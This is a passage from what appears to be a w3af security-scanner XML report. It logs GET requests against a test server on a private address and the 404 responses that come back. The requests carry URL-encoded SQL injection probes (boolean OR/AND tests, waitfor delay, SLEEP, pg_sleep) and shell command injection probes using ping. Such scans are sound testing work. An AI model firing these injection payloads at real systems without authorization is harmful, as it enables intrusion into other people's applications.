    &lt;a href='13%22+OR+%2213%22%3D%2213'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="720">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/13%22+AND+%2213%22%3D%2214 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 13%22+AND+%2213%22%3D%2214 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='13%22+AND+%2213%22%3D%2214'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="723">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%27+OR+%2724%27%3D%2724 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%27+OR+%2724%27%3D%2724 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%27+OR+%2724%27%3D%2724'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="724">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="730">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="731">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24%27+AND+%2724%27%3D%2725 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24%27+AND+%2724%27%3D%2725 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24%27+AND+%2724%27%3D%2725'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="742">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/59%27+OR+%2759%27%3D%2759 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 59%27+OR+%2759%27%3D%2759 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='59%27+OR+%2759%27%3D%2759'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="744">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/59%27+AND+%2759%27%3D%2760 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 59%27+AND+%2759%27%3D%2760 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='59%27+AND+%2759%27%3D%2760'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="748">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="751">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="752">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24+OR+24%3D24+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24+OR+24%3D24+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24+OR+24%3D24+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="757">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24+AND+24%3D25+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24+AND+24%3D25+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24+AND+24%3D25+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="765">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/75+OR+75%3D75+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 75+OR+75%3D75+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='75+OR+75%3D75+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="766">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="768">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="771">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/75+AND+75%3D76+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 75+AND+75%3D76+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='75+AND+75%3D76+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="782">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="787">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="798">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="802">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="815">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="818">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="831">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="835">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="847">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="850">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about run+ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='run+ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="861">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+pg_sleep%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+pg_sleep%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="873">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+pg_sleep%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+pg_sleep%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
